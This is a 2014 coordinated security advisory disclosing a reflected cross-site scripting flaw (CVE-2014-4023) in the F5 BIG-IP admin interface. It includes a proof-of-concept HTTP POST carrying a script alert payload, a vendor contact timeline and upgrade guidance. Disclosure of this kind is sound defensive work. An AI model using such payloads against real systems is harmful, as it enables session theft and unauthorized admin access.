F5 BIG-IP 11.5.1 Cross Site Scripting

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
SEC Consult Vulnerability Lab Security Advisory < 20140828-0 >  
=======================================================================  
title: Reflected Cross-Site Scripting  
product: F5 BIG-IP  
vulnerable version: <= 11.5.1  
fixed version: > 11.6.0  
impact: Medium  
CVE number: CVE-2014-4023  
homepage: https://f5.com/  
found: 2014-07-07  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
- -----------------------------  
"The BIG-IP product suite is a system of application delivery services that  
work together on the same best-in-class hardware platform or software virtual  
instance. From load balancing and service offloading to acceleration and  
security, the BIG-IP system delivers agility—and ensures your applications  
are fast, secure, and available."  
  
URL: https://f5.com/products/big-ip  
  
  
Vulnerability overview/description:  
- -----------------------------------  
BIG-IP suffers from a reflected Cross-Site Scripting vulnerability,  
which allow an attacker to steal other users sessions, to impersonate other  
users and to gain unauthorized access to the admin interface.  
  
  
Proof of concept:  
- -----------------  
The following HTTP request triggers the vulnerability:  
  
POST /tmui/dashboard/echo.jsp HTTP/1.1  
Host: BIGIP  
Cookie: BIGIPAuthCookie=*VALID_COOKIE*  
Content-Length: 29  
  
<script>alert('xss')</script>  
  
The server does not properly encode user supplied information and returns it  
to the user resulting in Cross-Site Scripting.  
  
  
Vulnerable / tested versions:  
- -----------------------------  
More information can be found at:  
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html  
  
  
Vendor contact timeline:  
- ------------------------  
2014-07-08: Sending advisory and proof of concept exploit via encrypted  
channel.  
2014-07-09: Vendor confirms receipt of advisory. States that fix will be  
released in the "next 6 weeks or so"  
2014-07-24: Vendor provides CVE: CVE-2014-4023  
2014-08-26: Vendor releases fixed version.  
2014-08-28: SEC Consult releases a coordinated security advisory.  
  
  
Solution:  
- ---------  
Update to the newest version.  
  
More information can be found at:  
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html  
  
  
Workaround:  
- -----------  
No workaround available.  
  
  
Advisory URL:  
- -------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested in working with the experts of SEC Consult?  
Write to [email protected]  
  
EOF Stefan Viehböck / @2014  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/  
  
iQEcBAEBAgAGBQJT/wVOAAoJECyFJyAEdlkKq9cIAKX9MEOpw8p9i8KWZXmkBiBr  
S3n9YPNk6bbGbm+YfNCvXvtdSTPhh4I1wBY/WYWENpnQrwdiJ3couS5f2/DQzHTP  
uCROxpmtxY1bokMS+ZHOPeGECk8RFr03kBZtGrF2cdGLWzBv7l+CnmopS8lnDVsw  
44/R5hj3OdZxhD3btFLXss1RPbUDU1vGV9KpDgJmsssS5pzvG9I2T9xGibd0zBIA  
WGA5jjGFitfQwDaxvqoocKgmBG2o3nQpdCShlaRiFklVJQYT1J+w/TWA1OOWZmxs  
91m6C9fqAqgeIjmFSOE5c/rpiw7MdzH46yUzoVhbqm6wKcngLDDmZDuqPwaqH18=  
=RsbU  
-----END PGP SIGNATURE-----  
`